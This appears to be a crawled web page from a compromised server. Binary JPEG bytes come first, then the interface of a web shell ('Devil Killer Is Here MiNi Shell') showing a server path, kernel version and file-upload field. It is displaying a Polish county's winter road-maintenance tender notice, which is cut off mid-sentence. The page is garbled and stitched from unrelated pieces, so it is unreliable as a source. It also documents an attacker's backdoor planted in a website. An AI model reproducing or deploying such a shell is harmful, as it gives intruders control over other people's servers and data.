JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230828/0037028101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług sprzętowo-transportowych w zakresie zimowego utrzymania dróg powiatowych na terenie Powiatu Kluczborskiego w sezonie zimowym 2023/2024 z podziałem na 5 zadań (części) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kluczborski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412504</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Katowicka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kluczbork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774185218</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mwalencka@powiatkluczborski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.powiatkluczborski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług sprzętowo-transportowych w zakresie zimowego utrzymania dróg powiatowych na terenie Powiatu Kluczborskiego w sezonie zimowym 2023/2024 z podziałem na 5 zadań (części) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1dc516ec-4580-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00370281</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00043348/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Świadczenie usług sprzętowo-transportowych w zakresie zimowego utrzymania dróg powiatowych na terenie Powiatu Kluczborskiego w sezonie zimowym 2023/2024 z podziałem na 5 zadań (części)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiatkluczborski.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja z Wykonawcami odbywać się będzie przy użyciu Platformy zakupowej Marketplanet Oneplace pod adresem: https://powiatkluczborski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zgodnie z art. 61 ust. 1 oraz 63 ust. 2 ustawy Pzp - komunikacja w niniejszym postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w<br/>ustawie Pzp, odbywać się będzie wyłącznie przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Pytania do SWZ należy zadawać za pośrednictwem platformy zakupowej Zamawiającego przez link: https://powiatkluczborski.ezamawiajacy.pl.<br/>Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem.<br/>3. Oferta wraz z załącznikami wg wzorowych formularzy musi być złożona w postaci elektronicznej w systemie informatycznym dostępnym pod adresem:<br/>https://powiatkluczborski.ezamawiajacy.pl<br/>Załączony formularz ofertowy i formularz cenowy (dla ZAD. 1; 2; 3; 4; 5) wraz z załącznikami, oświadczeniami itp. należy wypełnić w formie elektronicznej i opatrzyć:<br/>kwalifikowanym podpisem elektronicznym<br/>lub podpisem zaufanym<br/>lub elektronicznym podpisem osobistym.<br/>4. Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych wymaganych od wykonawcy przy wykorzystywaniu systemu<br/>do elektronicznej komunikacji z Wykonawcami: Oferta wraz z załącznikami musi zostać złożona w postaci elektronicznej. Złożenie oferty wymaga do Wykonawcy zarejestrowania się i zalogowania w systemie informatycznym dostępnym pod adresem:<br/>https://powiatkluczborski.ezamawiajacy.pl, zgodnie z poniższą kolejnością:<br/>-Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. Mając to na uwadze, Zamawiający zaleca Wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej.<br/>-Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony: https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>- Wykonawca biorący udział w postępowaniu prowadzonym drogą elektroniczną w systemie zakłada konto, wykonując kroki procesu<br/>rejestracyjnego: podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika<br/>polecenie „zarejestruj się”.<br/>- Po założeniu konta, Wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>5. Zamawiający wskazuje informacje, o których mowa w Rozporządzeniu Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów<br/>elektronicznych, dotyczące systemu dostępnego pod adresem: https://powiatkluczborski.ezamawiajacy.pl:<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta<br/>• Wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>•Podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowe).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE<br/>L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest STAROSTA KLUCZBORSKI Z SIEDZIBĄ W STAROSTWIE POWIATOWYM<br/>W KLUCZBORKU, UL. KATOWICKA 1, 46-200 KLUCZBORK.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail:<br/>starostwo@powiatkluczborski.pl<br/>Klauzula informacyjna dot. RODO zawarta została w Rozdziale XXIV SPECYFIKACJI WARUNKÓW ZAMÓWIENIA (SWZ) &#34;Ochrona danych osobowych&#34;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZD.272.4.2023.MW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> &#34;Zadanie nr 1 - Świadczenie usług sprzętowo-transportowych w zakresie zimowego utrzymania jezdni dróg powiatowych na terenie Powiatu Kluczborskiego - rejon 1 (gmina BYCZYNA) oraz zapewnienie placu do składowania mieszanki piaskowo-solnej&#34;<br/><br/>W ramach zadania nr 1 Wykonawca zapewni:<br/>•	co najmniej 1 pług do odśnieżania dróg zamontowany do pojazdu o masie całkowitej nie mniejszej niż 5 Mg i mocy nie mniejszej niż 120 KM;<br/>•	piaskarko-solarkę gotową do zwalczania śliskości wraz pojazdem,<br/>•	plac do składowania mieszanki piaskowo-solnej oraz zaplecze socjalne dla operatorów i kierowców,<br/>•	ładowarkę.<br/>Zimowemu utrzymaniu w ramach zadań nr 1 podlegają jezdnie dróg powiatowych, obręby skrzyżowań z drogami powiatowymi i gminnymi, zatoki autobusowe, przejazdy kolejowe, jezdnie na mostach i wiaduktach oraz inne miejsca wskazane przez Zamawiającego.<br/><br/>Ze względu na specyfikę zamówienia, którego wielkość i zakres ściśle uzależniony jest od trudnej do przewidzenia intensywności sezonów zimowych, zakresy pracy pojazdów i sprzętu są szacunkowe. Ilości te mają charakter orientacyjny i posłużą do ustalenia ceny ofertowej, a w przypadku oferty najkorzystniejszej do określenia orientacyjnej wartości umowy. Rzeczywista ilość usług zleconych do wykonywania uzależniona będzie od bieżących potrzeb (intensywności sezonu zimowego), przy czym zgodnie z art. 433 pkt. 4 ustawy PZP, Zamawiający gwarantuje realizację umowy tj. zapłatę należnego wynagrodzenia bez względu na intensywność sezonu zimowego - co najmniej na poziomie poniesionych kosztów przez Wykonawcę za gotowość (dyspozycyjność) do świadczenia usług ZUD.<br/><br/>Zamawiający wymaga by usługi były wykonywane zgodnie ze standardami Zimowego Utrzymania Dróg oraz wymaganiami SWZ i wytycznymi Specyfikacji Technicznych stanowiących załącznik do SWZ. <br/>Szczegółowy opis przedmiotu zamówienia oraz sposób jego realizacji został określony w SWZ wraz z załącznikami, a w szczególności w załącznikach: Specyfikacje Techniczna &#34;ST&#34; - Warunki realizacji usług - zał. nr 4 oraz Projektowane Postanowienia Umowy - zał. nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">63000000-9 - Usługi dodatkowe i pomocnicze w zakresie transportu, usługi biur podróży</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-11-01 do 2024-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował<br/>określonymi w SWZ warunkami, kryteriami oceny ofert oraz przepisami ustawy Pzp. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczbę punktów stanowiących sumę przyznanych w ramach każdego z podanych w SWZ kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, który spełni wszystkie postawione w Specyfikacji (SWZ) wraz z załącznikami warunki, spełni wymogi ustawy Pzp oraz otrzyma najwyższą liczbę punktów spośród ocenianych ofert, zgodnie z opisem Rozdz. XIX SWZ na podstawie określonych kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Najkorzystniejsza oferta po zsumowaniu punktacji z powyższych kryteriów może uzyskać maksimum 100 punktów.<br/>Szczegółowy OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT zawarto w Rozdziale XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia sprzętu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> &#34;Zadanie nr 2 - Świadczenie usług sprzętowo-transportowych w zakresie zimowego utrzymania jezdni dróg powiatowych na terenie Powiatu Kluczborskiego - rejon 2 (gmina KLUCZBORK) oraz zapewnienie placu do składowania mieszanki piaskowo-solnej&#34;<br/><br/>W ramach zadania nr 2 Wykonawca zapewni:<br/>•	co najmniej 1 pług do odśnieżania dróg zamontowany do pojazdu o masie całkowitej nie mniejszej niż 5 Mg i mocy nie mniejszej niż 120 KM;<br/>•	piaskarko-solarkę gotową do zwalczania śliskości wraz pojazdem,<br/>•	plac do składowania mieszanki piaskowo-solnej oraz zaplecze socjalne dla operatorów i kierowców,<br/>•	ładowarkę.<br/>Zimowemu utrzymaniu w ramach zadań nr 2 podlegają jezdnie dróg powiatowych, obręby skrzyżowań z drogami powiatowymi i gminnymi, zatoki autobusowe, przejazdy kolejowe, jezdnie na mostach i wiaduktach oraz inne miejsca wskazane przez Zamawiającego.<br/><br/>Ze względu na specyfikę zamówienia, którego wielkość i zakres ściśle uzależniony jest od trudnej do przewidzenia intensywności sezonów zimowych, zakresy pracy pojazdów i sprzętu są szacunkowe. Ilości te mają charakter orientacyjny i posłużą do ustalenia ceny ofertowej, a w przypadku oferty najkorzystniejszej do określenia orientacyjnej wartości umowy. Rzeczywista ilość usług zleconych do wykonywania uzależniona będzie od bieżących potrzeb (intensywności sezonu zimowego), przy czym zgodnie z art. 433 pkt. 4 ustawy PZP, Zamawiający gwarantuje realizację umowy tj. zapłatę należnego wynagrodzenia bez względu na intensywność sezonu zimowego - co najmniej na poziomie poniesionych kosztów przez Wykonawcę za gotowość (dyspozycyjność) do świadczenia usług ZUD.<br/><br/>Zamawiający wymaga by usługi były wykonywane zgodnie ze standardami Zimowego Utrzymania Dróg oraz wymaganiami SWZ i wytycznymi Specyfikacji Technicznych stanowiących załącznik do SWZ. <br/><br/>Szczegółowy opis przedmiotu zamówienia oraz sposób jego realizacji został określony w SWZ wraz z załącznikami, a w szczególności w załącznikach: Specyfikacje Techniczna &#34;ST&#34; - Warunki realizacji usług - zał. nr 4 oraz Projektowane Postanowienia Umowy - zał. nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">63000000-9 - Usługi dodatkowe i pomocnicze w zakresie transportu, usługi biur podróży</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-11-01 do 2024-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował<br/>określonymi w SWZ warunkami, kryteriami oceny ofert oraz przepisami ustawy Pzp. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczbę punktów stanowiących sumę przyznanych w ramach każdego z podanych w SWZ kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, który spełni wszystkie postawione w Specyfikacji (SWZ) wraz z załącznikami warunki, spełni wymogi ustawy Pzp oraz otrzyma najwyższą liczbę punktów spośród ocenianych ofert, zgodnie z opisem Rozdz. XIX SWZ na podstawie określonych kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Najkorzystniejsza oferta po zsumowaniu punktacji z powyższych kryteriów może uzyskać maksimum 100 punktów.<br/>Szczegółowy OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT zawarto w Rozdziale XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia sprzętu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> &#34;Zadanie nr 3 - Świadczenie usług sprzętowo-transportowych w zakresie zimowego utrzymania jezdni dróg powiatowych na terenie Powiatu Kluczborskiego - rejon 3 (gmina LASOWICE WIELKIE) oraz zapewnienie placu do składowania mieszanki piaskowo-solnej&#34;<br/><br/>W ramach zadania nr 3 Wykonawca zapewni:<br/>•	co najmniej 1 pług do odśnieżania dróg zamontowany do pojazdu o masie całkowitej nie mniejszej niż 5 Mg i mocy nie mniejszej niż 120 KM;<br/>•	piaskarko-solarkę gotową do zwalczania śliskości wraz pojazdem,<br/>•	plac do składowania mieszanki piaskowo-solnej oraz zaplecze socjalne dla operatorów i kierowców,<br/>•	ładowarkę.<br/>Zimowemu utrzymaniu w ramach zadań nr 3 podlegają jezdnie dróg powiatowych, obręby skrzyżowań z drogami powiatowymi i gminnymi, zatoki autobusowe, przejazdy kolejowe, jezdnie na mostach i wiaduktach oraz inne miejsca wskazane przez Zamawiającego.<br/><br/>Ze względu na specyfikę zamówienia, którego wielkość i zakres ściśle uzależniony jest od trudnej do przewidzenia intensywności sezonów zimowych, zakresy pracy pojazdów i sprzętu są szacunkowe. Ilości te mają charakter orientacyjny i posłużą do ustalenia ceny ofertowej, a w przypadku oferty najkorzystniejszej do określenia orientacyjnej wartości umowy. Rzeczywista ilość usług zleconych do wykonywania uzależniona będzie od bieżących potrzeb (intensywności sezonu zimowego), przy czym zgodnie z art. 433 pkt. 4 ustawy PZP, Zamawiający gwarantuje realizację umowy tj. zapłatę należnego wynagrodzenia bez względu na intensywność sezonu zimowego - co najmniej na poziomie poniesionych kosztów przez Wykonawcę za gotowość (dyspozycyjność) do świadczenia usług ZUD.<br/><br/>Zamawiający wymaga by usługi były wykonywane zgodnie ze standardami Zimowego Utrzymania Dróg oraz wymaganiami SWZ i wytycznymi Specyfikacji Technicznych stanowiących załącznik do SWZ. <br/><br/>Szczegółowy opis przedmiotu zamówienia oraz sposób jego realizacji został określony w SWZ wraz z załącznikami, a w szczególności w załącznikach: Specyfikacje Techniczna &#34;ST&#34; - Warunki realizacji usług - zał. 